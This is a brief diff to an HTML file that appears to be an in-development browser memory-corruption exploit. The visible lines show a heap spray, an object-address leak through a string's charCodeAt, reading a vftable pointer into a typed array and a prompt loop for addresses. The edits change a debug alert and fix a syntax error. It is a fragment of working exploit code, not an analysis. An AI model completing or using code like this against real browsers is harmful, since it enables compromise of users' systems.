--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start16");
+alert("start17");
 var spray=new Array(0x800);
 var tmp;
  for(var i=0;i<spray.length;i+=2){
@@ -98,7 +98,7 @@ var arr_addr=(s1.charCodeAt(a-1)<<16)+s1.charCodeAt(a-2)
 alert(arr_addr.toString(16));
 a=arr_addr/2;
 var vftable=s1.charCodeAt(a)+(s1.charCodeAt(a+1)<<16);
-alert(vftable.toString(16);
+alert(vftable.toString(16));
 spray[spray_index][typedarray_index]=vftable;
 while(1){
 a=prompt("addr");
